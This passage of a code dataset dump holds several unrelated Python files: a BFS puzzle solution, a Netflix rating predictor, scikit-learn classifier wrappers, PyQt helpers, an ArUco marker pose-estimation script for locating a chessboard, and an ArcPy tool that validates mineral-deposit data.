speedFormatError is True:\n    continueState = speedDataFormatError()\n    continueOrExitDueToFormat(continueState)\n\ncarSpeeds = calculateSpeedPerHr(dataDict)\ncalculateFines(carSpeeds)","sub_path":"Final Working Program + Testing Files/Zhi Feng - FINAL HAND IN/Zhi Feng Chen - US Speeding Program/Older Version/V3 Main.py","file_name":"V3 Main.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"207125067","text":"from collections import deque\r\n\r\nN, K = map(int, input().split())\r\nMAX_SIZE = 100001\r\n\r\nq = deque()\r\nq.append(N)\r\n\r\ncnt=0\r\ncheck=[-1]* MAX_SIZE\r\ncheck[N]=0\r\nwhile q:\r\n    x = q.popleft()\r\n    if x==K:\r\n        cnt+=1\r\n    for y in [x * 2, x + 1, x - 1]:\r\n        if 0 <= y < MAX_SIZE:\r\n            if check[y]==-1 or check[y]>=check[x]+1: \r\n                check[y]=check[x]+1\r\n                q.append(y)\r\n\r\nprint(check[K])\r\nprint(cnt)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"BOJ12851.py","file_name":"BOJ12851.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"101097549","text":"import requests\n\n# get your API key https://app.ioannotator.com/api\nparams= {'apikey': 'add your API key here',\n         'dataset': 'add your dataset ID here',}\n\napi = 'https://api.ioannotator.com/export'\n\n\nx 
= requests.get(api, params=params)\n\nprint(x.text)","sub_path":"python/text/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278731577","text":"import math\n\n\ndef netflix_read(r):\n\ts = r.readline().rstrip('\\n')\n\tif s == \"\":\n\t\treturn []\n\telse:\n\t\treturn s\n\n\ndef rmse(a,b):\n\n\tassert len(a) == len(b)\n\tsum = 0\n\tfor n in range(len(a)):\n\t\tx = a[n] - b[n]\n\t\tsum += (x**2)\n\tmean = sum/len(a)\n\tr = math.sqrt(mean)\n\treturn r\n\n\n# -----\n# make dictionary rpc_cache\n# average ratings per customer\n# -----\n\nrpc_file = open('/u/prat0318/netflix-tests/ctd446-userAverageRating.txt','r')\nrpc_cache = eval(rpc_file.readline())\n\n\n\n# -----\n# make dictionary rpm_cache\n# average ratings per movie\n# -----\n\nrpm_file = open('/u/prat0318/netflix-tests/php274-MovieRatings.txt','r')\nrpm_cache = {}\nreading = True\nwhile reading == True:\n\trpm_line = rpm_file.readline()\n\tif rpm_line == \"\":\n\t\treading = False\n\telse:\n\t\tlineKey, lineValue = rpm_line.split(\":\")\n\n\t\trpm_cache[str(lineKey)] = str(lineValue[0:len(lineValue)-1])\n\n# ------\n# make dictionary probe_answers\n# real ratings for data in probe.txt\n# ------\n\nprobe_file = open('/u/prat0318/netflix-tests/erb988+np6593-ProbeAnswersDictionary.txt','r')\nprobe_answers = eval(probe_file.readline())\n\n\n# -----\n# cache with movie release dates\n# -----\n\ndate_file = open('/u/prat0318/netflix-tests/ccm2493-movie_info_cache.txt','r', errors ='ignore')\ndate_cache = eval(date_file.readline())\n\n\n\n\n\n# -----\n# lists will be passed to rmse.py\n# -----\n\nglobal prediction_list\nprediction_list = []\n\nglobal actual_list\nactual_list = []\n\n\n# -----\n# predict what one customer will rate one movie\n# -----\n\ndef predict(cust, movie):\n\n\n\n\n\tmovie_average = float(rpm_cache[movie])\n\tcustomer_average = float(rpc_cache[cust])\n\n\tassert 1 <= movie_average <= 5\n\tassert 1 <= customer_average <= 5\n\n\tmovie_offset = 0\n\tcustomer_offset = 0\n\tdate_offset = 0\n\n\t# movie offset conditionals\n\n\tif round(movie_average) == 1:\n\t\tmovie_offset = -0.4\n\telif round(movie_average) == 2:\n\t\tmovie_offset = -0.1\n\telif round(movie_average) == 3:\n\t\tmovie_offset = 0\n\telif round(movie_average) == 4:\n\t\tmovie_offset = 0.1\n\telif round(movie_average) == 5:\n\t\tmovie_offset = 0.4\n\n\t# customer offset conditionals\n\n\tif round(customer_average) == 1:\n\t\tcustomer_offset = -0.4\n\telif round(customer_average) == 2:\n\t\tcustomer_offset = -0.1\n\telif round(customer_average) == 3:\n\t\tcustomer_offset = 0\n\telif round(customer_average) == 4:\n\t\tcustomer_offset = 0.1\n\telif round(customer_average) == 5:\n\t\tcustomer_offset = 0.4\n\n\t# release date conditionals\n\n\trelease_date = date_cache[eval(movie)]['year']\n\t\n\n\tif release_date == 'Unknown':\n\t\tdate_offset = 0\n\n\telif int(release_date) < 1950:\n\t\tdate_offset = 0.10\n\n\telif 1950 <= int(release_date) < 1975:\n\t\tdate_offset = 0.1\n\n\telif 1975 <= int(release_date) < 2000:\n\t\tdate_offset = 0\n\n\telif int(release_date) >= 2000:\n\t\tdate_offset = -0.1\n\t\n\t# -----\n\t# prediction\n\t# ----------\t\n\n\tprediction = (customer_average + movie_average)/2 + customer_offset + movie_offset + date_offset\n\n\n\tprediction_list.append(prediction)\n\tactual_list.append(probe_answers[int(movie)][int(cust)])\n\t\n\n\treturn prediction\n\n\n\n\ndef netflix_print_movie(w,movie):\n\tw.write(movie + 
\":\" + \"\\n\")\n\ndef netflix_print_prediction(w, pred):\n\tw.write('%0.3s \\n' %(pred))\n\ndef netflix_print_rmse(w, rmse):\n\tassert prediction_list\n\tassert actual_list\n\tw.write('RMSE: %0.4s' %(rmse))\n\n\n\n\ndef netflix_solve(r,w):\n\t\"\"\"\n\tr a reader\n\tw a writer\n\t\"\"\"\n\n\tcurrent_movie = '1'\n\tcurrent_customer = '30878'\n\twhile True:\n\t\ta = netflix_read(r)\n\n\t\tif not a:\n\t\t\tnetflix_print_rmse(w,str(rmse(prediction_list, actual_list)))\n\t\t\treturn\n\t\telif a[len(a)-1]==\":\":\n\t\t\tcurrent_movie = a[:len(a)-1]\n\t\t\tnetflix_print_movie(w,current_movie)\n\t\telse:\n\t\t\tcurrent_customer = a\n\t\t\tprediction = predict(current_customer,current_movie)\n\t\t\tnetflix_print_prediction(w, str(prediction))\t\n\n\n\t\n\n\n\n","sub_path":"Netflix.py","file_name":"Netflix.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200776069","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\n\n#kNN diff neighbors and diff weight\ndef kNeighbours(n_neighbors, weight, feature_train, label_train, feature_test):\n classifier = KNeighborsClassifier(n_neighbors, weight)\n classifier.fit(feature_train, label_train)\n label_prediction = classifier.predict(feature_test)\n proba = classifier.predict_proba(feature_test)\n return label_prediction, proba\n\n#Naive bayes\ndef naiveBayes(feature_train, label_train, feature_test):\n classifier = GaussianNB()\n #gnb.fit(X_train, y_train).predict(X_test)\n classifier.fit(feature_train, label_train)\n predicted = classifier.predict(feature_test)\n proba = classifier.predict_proba(feature_test)\n return predicted, proba\n\n\n\ndef getPredictionData(type, X_train, X_test, Y_train, Y_test, N_NEIGHBORS):\n if (type == \"NaiveBayes\"):\n label_prediction, proba = naiveBayes(X_train,Y_train, X_test)\n elif (type == \"kNeighbours\"):\n label_prediction, proba = kNeighbours(N_NEIGHBORS,'uniform', X_train, Y_train, X_test)\n\n return label_prediction, proba","sub_path":"exercise-classification/src/classification_alg.py","file_name":"classification_alg.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"520224104","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport platform\nimport sys\nimport string\nimport time\nimport datetime\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\ndef w(obj, dic = {}):\n a = type(obj)\n if a == QLineEdit:\n return str(obj.text())\n elif a == QCheckBox:\n return obj.isChecked()\n elif a == QPlainTextEdit:\n return str(obj.toPlainText())\n elif a == QComboBox:\n return dic[obj.currentText()]\n\ndef r(obj,var,field):\n a = type(obj)\n if a == QCheckBox:\n obj.setChecked(var[field])\n elif a == QLineEdit:\n obj.setText(var[field])\n elif a == QPlainTextEdit:\n obj.appendPlainText(var[field])\n elif a == QComboBox:\n obj.setEditText(var[field])\n\n\nif __name__ == '__main__':\n pass","sub_path":"libqt.py","file_name":"libqt.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625404166","text":"#!/usr/bin/env python\n\n\"\"\"\n\n\tWorld to image points.\n\n\tWorld coordinate to image coordinate. Move from any 3D world coordinate to \n\ta pixel on the given image. \n\n\t1.) 
Detect location of aruco marker corners on 2D image.\n\n\t\t\tdetect all corners mij for 0 < i < 4 and 0 < j < 4.\n\n\n\t\t\t\t\t\t\tm00 m01 \tm10 m11\n\t\t\t\t\t\t\tm03 m02 \tm13 m12\n\n\t\t\t\t\t\t\t\t(chessboard)\n\n\t\t\t\t\t\t\tm30 m31 \tm20 m21\n\t\t\t\t\t\t\tm33 m32 \tm23 m22\n\n\n\t\t\twhere,\n\n\t\t\t\tmij ~ 2d pixel coordinate [x,y] of corner index \"j\" of aruco marker with id \"i\". \n\n\t\t\t\t* Coordinates of corners use standard image axis - \"(0,0) is at the top left of the image\"\n\n\t\tThis is done in the file \"aruco_marker_detection.py\" by the method: \n\n\t\t\t??? ### detect_aruco_marker_corners(image, aruco_dict)\n\n\t\tWhich returns a matrix, A, of 2D coordinates of aruco marker corners on the image.\n\n\n\t\t\n\t\t\t\t\t\t\t\t\tA = \n\n\t\t\t\t\t[ [[m00_x, m00_y], ..., [m03_x, m03_y]],\n\t\t\t\t\t\t... , \n\t\t\t\t\t[[m30_x, m30_y], ..., [m33_x, m33_y]] ]\n\n\n\t\t\t\t (Aruco Marker Corner 2D Image Locations Matrix)\n\n\t\t\twhere,\n\n\t\t\t\tA ~ Matrix of 2D image coordinates of aruco marker corners\n\t\t\t\tmij_x ~ x coordinate of aruco marker \"i\"'s \"j\"th corner.\n\t\t\t\tmij_y ~ y coordinate of aruco marker \"i\"'s \"j\"th corner.\n\n\t\t\t\n\t\t\t\t* (4x4x2) ~ (marker_id, corner_id, 2D_image_coordinate)\n\t\t\t\t* Coordinates of corners use standard image axis - \"(0,0) is at the top left of the image\"\n\t\t\n\t2.) Solve for Rotation matrix and translation vector \n\t\tto move between camera coordinates and world coordinates.\n\n\t\t\tUsing \n\t\t\t\t- known world coordinates of the aruco markers (object points from real world measurements) \n\t\t\t\t- detected corners on a 2D image (A)\n\t\t\t\t- instrinsic camera parameters file from \"camera_calibration.py\" (mtx, dist)\n\n\t\t\tsolve for the rotation matrix, R, and the translation vector, t,\n\t\t\tusing opencv's cv2.solvePnPRansac function. \n\n\t3.) Move from any 3D wolrd coordinate to 2D image coordinate.\n\n\t\t\tNow the 2D coordinate of any point on the image can be found if the 3D world coordinate\n\t\t\tis know by using R, t, mtx, dist to go from world coordinates to camera coordinates, then by \n\t\t\tprojecting the 3D camera coordinates point to the image plane using opencv's cv2.projectPoints.\n\n\t\t\twhere,\n\n\t\t\t\tmtx ~ camera matrix.\n\t\t\t\tdist ~ distortion coefficients.\n\t\t\t\tR ~ rotation matrix \n\t\t\t\tt ~ translation vector\n\n\n\n\"\"\"\n\n__author__ = \"l.j. Brown\"\n__version__ = \"1.0.4\"\n\n#\n#\n#\t\t\t\t\t\t\t\t\timports\t\n#\n#\n\n# internal\nimport os\nimport logging\nimport random\n\n# external\nimport glob\nimport numpy as np\nimport cv2\nimport cv2.aruco as aruco\nfrom scipy import stats\n\n# my lib\nimport aruco_marker_detection as marker_detector\n\n#\n#\n#\t\t\t\t\t\t\t\t\tSettings\n#\n#\n\nARUCO_MARKER_SETTINGS_FNAME = \"aruco_markers/aruc_markers_settings.json\" \t\t# Do not change\n\ninput_ftemplate = \"test_aruco_images_input/%s\"\noutput_ftemplate = \"test_aruco_images_output/%s\"\n\n#\n# \tAruco marker 3D model points. 
\"world points\" of corners\n#\n\nmh,mw = 3.0,3.0 \t# inches\nmH,mW = 31.5, 31.25 # inches \n\naruco_model_points = np.array([\n\t\t\t\t\t\t\t# \tx, \ty, \tz= 0.0\n\n\t\t\t\t\t\t\t(\t0.0, \t0.0, \t0.0\t\t), # m00\n\t\t\t\t\t\t\t(\tmw, \t0.0, \t0.0\t\t),\t\t\t # m01\n\t\t\t\t\t\t\t(\tmw, \tmh, \t0.0\t\t), # m02\n\t\t\t\t\t\t\t(\t0.0, \tmh,\t\t0.0\t\t),\t\t\t # m03\n\n\t\t\t\t\t\t\t(\tmW-mw, \t0.0, \t0.0\t\t), \t # m10\n\t\t\t\t\t\t\t(\tmW, \t0.0, \t0.0\t\t),\t\t\t # m11\n\t\t\t\t\t\t\t(\tmW, \tmh, \t0.0\t\t), # m12\n\t\t\t\t\t\t\t(\tmW-mw, \tmh, \t0.0\t\t),\t\t\t # m13\n\n\t\t\t\t\t\t\t(\tmW-mw, \tmH-mh, \t0.0\t\t), \t\t # m20\n\t\t\t\t\t\t\t(\tmW, \tmH-mh, \t0.0\t\t),\t\t\t # m21\n\t\t\t\t\t\t\t(\tmW, \tmH, \t0.0\t\t), # m22\n\t\t\t\t\t\t\t(\tmW-mw, \tmH, \t0.0\t\t)\t\t\t # m23\n\n\t\t\t\t\t\t])\n\n# Board measurements\nbh, bw = 7.75, 7.75 \t# inches\ntlx, tly = 11.50, 11.50 # inches\nheight = -0.75 \t\t\t# inches\nchessboard_model_points = np.array([\n\n\t\t\t\t\t\t\t# \tx, \ty, \tz= -0.75\n\n\t\t\t\t\t\t\t(\ttlx, \ttly, \theight\t\t), # b0 - top left\n\t\t\t\t\t\t\t(\ttlx+bw, tly, \theight\t\t),\t\t\t # b1 - top right\n\t\t\t\t\t\t\t(\ttlx+bw, tly+bh, height\t\t), # b2 - bottom right\n\t\t\t\t\t\t\t(\ttlx, \ttly+bh,\theight\t\t)\t\t\t # b3 - bottom left\n\t\t\t\t\t\t])\n\n\n# Base measurments\nbh, bw = 11.75, 10.75 \t# inches\ntlx, tly = 10.15, 11.0\t# inches\nchesboard_lower_border_model_corner_points = np.array([\n\n\t\t\t\t\t\t\t# \tx, \ty, \tz= 0.0\n\n\t\t\t\t\t\t\t(\ttlx, \ttly, \t0.0\t\t), # b0 - top left\n\t\t\t\t\t\t\t(\ttlx+bw, tly, \t0.0\t\t),\t\t\t # b1 - top right\n\t\t\t\t\t\t\t(\ttlx+bw, tly+bh, 0.0\t\t), # b2 - bottom right\n\t\t\t\t\t\t\t(\ttlx, \ttly+bh,\t0.0\t\t)\t\t\t # b3 - bottom left\n\t\t\t\t\t\t])\n\n\n#\n#\n#\t\t\t\t\t\t\t\t\tLogging\n#\n#\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n#\n#\n#\t\t\t\t\t\t\t\t\tMethods\n#\n#\n\n#\n# Load input images\n#\n\ndef load_images_from_template(image_file_template):\n\n\t# dictonary : { base_fname : {'cv2 image' : image, 'full path' : fpath}, ...}\n\tfname_image_dict = {}\n\n\timages = glob.glob(image_file_template % '*')\n\tfor fpath in images:\n\t\tbase_fname = os.path.split(fpath)[1]\n\t\timage = cv2.imread(fpath)\n\t\tfname_image_dict[base_fname] = {'cv2 image' : image, 'full path' : fpath}\n\n\treturn fname_image_dict\n\n#\n# Write output images\n#\n\ndef write_image_dict(output_image_dict, output_image_file_template):\n\n\tfor base_fname,v in output_image_dict.items():\n\t\tfpath = output_image_file_template % base_fname\n\t\timage = v['cv2 image']\n\t\tcv2.imwrite(fpath, image)\n\n#\n# Estimate Camera Matrix\n#\n\ndef estimate_camera_matrix(image, focal_length=None):\n\tsize = input_image.shape\n\n\t# Camera internals (estimated)\n\t\n\tif focal_length is None:\n\t\tfocal_length = size[1]\n\n\tcenter = (size[1]/2, size[0]/2)\n\tcamera_matrix = np.array(\n\t\t\t\t\t\t\t [[focal_length, 0, center[0]],\n\t\t\t\t\t\t\t [0, focal_length, center[1]],\n\t\t\t\t\t\t\t [0, 0, 1]], dtype = \"double\"\n\t\t\t\t\t\t\t )\n\n\treturn camera_matrix\n\n#\n# Estimate Distortion Coefficients\n#\n\ndef estimate_distortion_coefficients():\n\tdist_coeffs = np.zeros((4,1)) # Assuming no lens distortion\n\treturn dist_coeffs\n\n#\n# Solve for rotation matrix and translation vector\n#\n\ndef solve_PNPransac(model_points, image_points, camera_matrix, dist_coeffs):\t# use aruco_image_points and aruc_model_points\n\t_, rotation_matrix, translation_vector, _ = cv2.solvePnPRansac(model_points, image_points, 
camera_matrix, dist_coeffs)\n\treturn rotation_matrix, translation_vector\n\n\n#\n#\tSolve PNP \n#\n\ndef solve_PNP(model_points, image_points, camera_matrix, dist_coeffs):\t# use aruco_image_points and aruc_model_points\n\t_, rotation_matrix, translation_vector = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs) #, flags = cv2.CV_EPNP)\n\t\n\treturn rotation_matrix, translation_vector\n\n#\n# Project world points to 2D image points. World points is an nx3 matrix for n points (x,y,z).\n#\n\ndef world_to_image_point(world_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs):\n\n\timage_points, _ = cv2.projectPoints(world_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t# clean up corners\n\tcleaned_image_points = np.array(list([ip[0].tolist() for ip in image_points]))\n\timage_points = cleaned_image_points.reshape(-1,2)\n\n\treturn image_points\n\n\n#\n#\n#\tDrawing Methods\n#\n#\n\n#\n#\tDraw nx2 point matrix onto image and return image\n#\n\ndef draw_point_matrix(image_points, image, color=None, thickness=15):\n\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tfor i in range(image_points.shape[0]):\n\t\tcenter = np_2_tupple_int(image_points[i])\n\t\tradius = 1\n\t\tif color is None:\n\t\t\tcolor = (0,0,255)\n\t\tcv2.circle(image, center, radius, color, thickness, lineType=8, shift=0)\n\n\treturn image\n\ndef draw_triangle(T, input_image, color=None, lineThickness = 4):\n\t# T - 3x2 matrix following clockwise convention\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tif color is None:\n\t\tcolor = (0,255,0)\n\n\tfor i in range(3):\n\t\tstart_coor = T[i,:]\n\t\tif i == 2:\n\t\t\tend_coor = T[0,:]\n\t\telse:\n\t\t\tend_coor = T[i+1,:]\n\n\t\t# draw line on image\n\t\tcv2.line(input_image, np_2_tupple_int(start_coor), np_2_tupple_int(end_coor), color, lineThickness)\n\n\treturn input_image\n\ndef draw_box(B, input_image, color=None, lineThickness = 4):\n\t# B - 4x2 matrix following clockwise convention\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tif color is None:\n\t\tcolor = (0,255,0)\n\n\tfor i in range(4):\n\t\tstart_coor = B[i,:]\n\t\tif i == 3:\n\t\t\tend_coor = B[0,:]\n\t\telse:\n\t\t\tend_coor = B[i+1,:]\n\n\t\t# draw line on image\n\t\tcv2.line(input_image, np_2_tupple_int(start_coor), np_2_tupple_int(end_coor), color, lineThickness)\n\n\treturn input_image\n\ndef draw_box_diagnols(B, input_image, color=None, lineThickness=4):\n\t# B - 4x2 matrix following clockwise convention\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tif color is None:\n\t\tcolor = (0,255,0)\n\n\t# draw positive diagnol\n\tcv2.line(input_image, np_2_tupple_int(B[3]), np_2_tupple_int(B[1]), color, lineThickness)\n\n\t# draw negitive diagnol\n\tcv2.line(input_image, np_2_tupple_int(B[0]), np_2_tupple_int(B[2]), color, lineThickness)\n\n\treturn input_image\n\n\n# regression [slope, intercept] of best fit line from points\ndef regression_line_poly_coeffs(xs,ys):\n\n\t# perform linear regression\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(xs,ys)\n\n\t# polynomial coefficents for best fit line\n\tp = [slope, intercept]\n\t\n\treturn p\n\n\ndef interpolate_additional_points(aruco_image_points, line_point_indices, input_image):\n\n\t\tline_image_points = aruco_image_points[line_point_indices] # get image points that should lay on the line\n\n\t\t#\tseperate x and y columns\n\t\tx = line_image_points[:,0]\n\t\ty = line_image_points[:,1]\n\n\t\t# 
perform linear regression and retreive polynomial coefficents for best fit line\n\t\tp = regression_line_poly_coeffs(x,y)\n\n\t\t# lambda function for y value given x -- rounded to an integer\n\t\tline_y_hat = lambda x: int(np.polyval(p,x))\n\t\tstart_coor = (int(x[0]), line_y_hat(x[0]))\n\t\tend_coor = (int(x[-1]), line_y_hat(x[-1]))\n\n\t\t# draw line on image\n\t\t#lineThickness = 4\n\t\t#cv2.line(input_image, start_coor, end_coor, (255,0,0), lineThickness)\n\n\t\treturn input_image\n\ndef point_of_intersection(coeffs_line_1, coeffs_line_2):\n\n\t\t\"\"\"\n\n\t\t\tline intersection\n\n\t\t\tax+c=bx+d.\n\n\t\t\trearrange to extract value of x\n\t\t\tax-bx=d-c\n\n\t\t\tx=(d-c)/(a-b)\n\t\t\ty=a(d-c)/(a-b) +c.\n\n\t\t\tpoint of interscetion is\n\n\t\t\t\t<(d-c)/(a-b) , (ad - bc)/(a-b)>\n\n\t\t\"\"\"\n\n\t\ta, c = coeffs_line_1\n\t\tb, d = coeffs_line_2\n\n\t\tpoint = [int((d-c)/(a-b)), int((a*d - b*c)/(a-b))]\n\n\t\treturn point\n\n\n#\n#\n#\t\t\t\t\t\t\t\tProgram\n#\n#\n\nif __name__ == '__main__':\n\t\n\n\tinput_image_dict = load_images_from_template(input_ftemplate) # originals\n\toutput_image_dict = input_image_dict.copy() \n\n\n\tfor k,v in input_image_dict.items():\n\n\t\t#\n\t\t# \tload image\n\t\t#\n\n\t\tinput_image = v['cv2 image']\n\n\n\n\t\t#\n\t\t#\tperform basic detection on aruco corners, solve pnpransac, project points\n\t\t#\n\n\t\t# detect image points\n\t\taruco_image_points = marker_detector.detect_aruco_image_points(input_image)\n\n\t\tcamera_matrix = estimate_camera_matrix(input_image)\n\t\tdist_coeffs = estimate_distortion_coefficients()\n\t\trotation_matrix, translation_vector = solve_PNPransac(aruco_model_points, aruco_image_points, camera_matrix, dist_coeffs)\n\n\t\t# NEW solvePNP\n\t\trotation_matrix, translation_vector = solve_PNP(aruco_model_points, aruco_image_points, camera_matrix, dist_coeffs)\n\n\t\t# project 3d world points of chessboard corners to image points\n\t\tchessboard_corner_points = world_to_image_point(chessboard_model_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t\t# project correct 3d world points of aruco markers to image points\n\t\tcheck_aruco_image_points = world_to_image_point(aruco_model_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t\t# project 3d world points of chessboard base frame to image points\n\t\tchessboard_base_model_image_points = world_to_image_point(chesboard_lower_border_model_corner_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t\t#\n\t\t# draw all points\n\t\t#\n\n\t\t# draw detected aruco trianlge ingonoring pnpsolver\n\t\t# indices 0,5,10\n\t\t#input_image = draw_triangle(aruco_image_points[[0,5,10]], input_image, color=(255,0,0))\n\n\n\t\t# draw projected aruco trianlge using pnpsolver\n\t\t# indices 0,5,10\n\t\t#input_image = draw_triangle(check_aruco_image_points[[0,5,10]], input_image, color=(0,0,255), lineThickness=10)\n\n\t\t# draw detected aruco box ingonoring pnpsolver\n\t\t#indices 0,5,10,15\n\t\t#input_image = draw_box(aruco_image_points[[0,5,10,15]], input_image, color=(255,0,0))\n\t\t#input_image = draw_box_diagnols(aruco_image_points[[0,5,10,15]], input_image, color=(255,0,0))\n\n\t\t# draw projected aruco box using pnpsolver\n\t\t#indices 0,5,10,15\n\t\t#input_image = draw_box(check_aruco_image_points[[0,5,10,15]], input_image, color=(0,0,255))\n\t\t#input_image = draw_box_diagnols(check_aruco_image_points[[0,5,10,15]], input_image, color=(0,0,255), lineThickness=10)\n\n\t\t# draw error points/ predicted 
points\n\t\t#input_image = draw_point_matrix(check_aruco_image_points, input_image)\t# \"error\"\n\n\t\t# draw detected aruco points\n\t\t#input_image = draw_point_matrix(aruco_image_points, input_image, color=(255,0,0))\n\n\t\t# draw predicted chessboard corner points\n\t\t#input_image = draw_point_matrix(chessboard_corner_points, input_image, color=(0,255,0))\n\n\n\t\t# draw chessboard frame\n\t\tinput_image = draw_box(chessboard_corner_points, input_image, color=(0,255,0), lineThickness=2)\n\t\t#input_image = draw_box_diagnols(chessboard_corner_points, input_image, color=(0,255,0))\n\n\t\t# draw base of chessboard frame\n\t\tinput_image = draw_box(chessboard_base_model_image_points, input_image, color=(0,255,0))\n\t\t#input_image = draw_box_diagnols(chessboard_base_model_image_points, input_image, color=(0,255,0), lineThickness=20)\n\n\n\n\t\t#\n\t\t# \tset output image in dictonary\n\t\t#\n\n\t\toutput_image_dict[k]['cv2 image'] = input_image\n\n\n\t# write output image dictonary\n\twrite_image_dict(output_image_dict, output_ftemplate)\n\n","sub_path":"chessboard_corner_detection/world_to_image_points.py","file_name":"world_to_image_points.py","file_ext":"py","file_size_in_byte":13608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"59168645","text":"import arcpy\nimport os\nimport json\n\narcpy.env.overwriteOutput = True\n\njsonfile = open(r'\\\\srvfile01\\bdgeocientifica$\\Addins_Geoprocesos\\PotencialMinero\\scripts\\config_tools.json', 'r')\nconfigTmp = json.load(jsonfile)\nconfig = configTmp[\"depositosMinerales\"]\njsonfile.close()\ndel jsonfile\n\n\nclass depoMin:\n\tdef __init__(self):\n\t\tself.ws = arcpy.GetParameterAsText(0)\n\t\tself.fc = arcpy.GetParameterAsText(1)\n\t\tself.grade = arcpy.GetParameterAsText(2)\n\t\tself.value = arcpy.GetParameterAsText(3)\n\t\tself.domains = config[\"domains\"]\n\t\tself.msg = config[\"msg\"]\n\t\tself.error = config[\"error\"]\n\t\tself.information = []\n\n\n\tdef consistency_01_Grado(self):\n\t\tarcpy.AddMessage(\"\\n {}: {}...\".format(self.msg[\"m1\"], self.grade))\n\t\terrores = [[1, x[0], x[1].lower()] for x in arcpy.da.SearchCursor(self.fc, [\"OID@\", self.grade]) if x[1].lower() not in self.domains[\"grade\"]]\n\t\tif len(errores) != 0:\n\t\t\tself.information.extend(errores)\n\t\telse:\n\t\t\tpass\n\n\n\tdef consistency_02_Value(self):\n\t\tarcpy.AddMessage(\" {}: {}...\".format(self.msg[\"m2\"], self.value))\n\t\terrores = [[2, x[0], x[1]] for x in arcpy.da.SearchCursor(self.fc, [\"OID@\", self.value]) if x[1] < self.domains[\"value\"][\"min\"] and x[1] > self.domains[\"value\"][\"max\"]]\n\t\tif len(errores) != 0:\n\t\t\tself.information.extend(errores)\n\t\telse:\n\t\t\tpass\n\n\n\tdef process(self):\n\t\tarcpy.AddMessage(\"\\n {}: {}... 
\".format(self.msg[\"m3\"], os.path.basename(self.ws)))\n\t\ttry:\n\t\t\tdesc = arcpy.Describe(self.ws)\n\t\t\tif desc.datatype == u'Workspace':\n\t\t\t\tif arcpy.Exists(os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales')):\n\t\t\t\t\tif len(self.information) > 0:\n\t\t\t\t\t\tarcpy.AddMessage(\" Errores:\")\n\t\t\t\t\t\tfor x in self.information:\n\t\t\t\t\t\t\te = self.error[\"e{}\".format(x[0])]\n\t\t\t\t\t\t\tarcpy.AddWarning(\" {}: FID: {}, Valor: {}\".format(e, x[1], x[2]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tarcpy.AddMessage(\" {}...\".format(self.msg[\"m4\"]))\n\t\t\t\t\t\tcopia = arcpy.CopyFeatures_management(self.fc, \"in_memory\\\\depositosMinerales\")\n\t\t\t\t\t\twith arcpy.da.UpdateCursor(copia, [self.grade]) as cursorUC:\n\t\t\t\t\t\t\tfor row in cursorUC:\n\t\t\t\t\t\t\t\trow[0] = row[0].lower()\n\t\t\t\t\t\t\t\tcursorUC.updateRow(row)\n\t\t\t\t\t\tdel cursorUC\n\t\t\t\t\t\tcampos = {\"GRADO\": self.grade, \"VALOR\": self.value}\n\t\t\t\t\t\tarcpy.DeleteRows_management(os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales'))\n\t\t\t\t\t\tfor k, v in campos.items():\n\t\t\t\t\t\t\tarcpy.AlterField_management(copia, v, k)\n\t\t\t\t\t\tarcpy.Append_management(copia, os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales'), \"NO_TEST\")\n\t\t\t\t\t\tarcpy.SetParameterAsText(4, os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales'))\n\t\t\t\t\t\tarcpy.AddMessage(\"\\n {}... \\n\".format(self.msg[\"m5\"]))\n\t\t\t\t\t\tarcpy.AddMessage(\" {} \\n\".format(self.msg[\"m6\"]))\n\t\t\t\telse:\n\t\t\t\t\traise RuntimeError(\"\\n {}... \\n\".format(self.error[\"e3\"]))\n\t\t\telse:\n\t\t\t\traise RuntimeError(\"\\n {}... \\n\".format(self.error[\"e4\"]))\n\t\texcept Exception as e:\n\t\t\tarcpy.AddWarning(e)\n\n\n\n\tdef main(self):\n\t\tself.consistency_01_Grado()\n\t\tself.consistency_02_Value()\n\t\tself.process()\n\n\nif __name__ == \"__main__\":\n\tobj = depoMin()\n\tobj.main()","sub_path":"tbx/desarrollo/V4_depositosMinerales.py","file_name":"V4_depositosMinerales.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125157922","text":"# -*- coding: utf-8 -*-\nimport re\nfrom collections import defaultdict\nfrom 